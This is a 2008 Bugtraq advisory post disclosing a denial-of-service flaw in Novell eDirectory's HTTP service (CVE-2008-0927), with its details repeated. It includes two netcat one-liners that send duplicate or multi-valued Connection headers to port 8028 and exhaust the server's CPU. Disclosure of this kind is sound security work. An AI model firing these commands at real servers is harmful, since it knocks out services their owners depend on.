Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Novell eDirectory DoS via HTTP headers
May 05 2008 07:26PM
Nicob (nicob nicob net)
[=] Affected software :
Editor : Novell
Name : eDirectory
Version : < 8.7.3 SP 10 and < 8.8.2
Services : TCP/8028 (HTTP) and TCP/8030 (HTTPS)
[=] External references :
http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=
1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927
[=] Technical details :
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
Nicob
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
Editor : Novell
Name : eDirectory
Version : < 8.7.3 SP 10 and < 8.8.2
Services : TCP/8028 (HTTP) and TCP/8030 (HTTPS)
[=] External references :
http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=
1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927
[=] Technical details :
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
Nicob
[ reply ]